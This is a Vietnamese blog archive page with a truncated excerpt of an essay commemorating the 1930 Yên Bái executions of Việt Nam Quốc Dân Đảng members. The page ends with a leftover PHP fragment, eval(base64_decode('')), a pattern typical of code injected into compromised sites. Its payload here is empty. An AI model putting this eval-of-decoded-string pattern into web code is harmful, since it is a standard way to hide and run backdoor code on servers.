Archive for June 15th, 2015

Không ai trong số họ đã hô “Việt Nam Quốc Dân Đảng muôn năm”

Không ai trong số họ đã hô “Việt Nam Quốc Dân Đảng muôn năm”

Tưởng Niệm 85 năm Ngày Tang Yên Bái Vào khoảng thời gian này 85 năm trước, tức vài hôm sau Ngày Tang Yên Bái, ngày 17 tháng Sáu năm 1930, bức hình bên đây được đăng trên báo Pháp. Mười ba chiếc đầu của các đảng viên Việt Nam Quốc D

06.15.2015 | Tiểu Luận- Chính Luận |

8 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>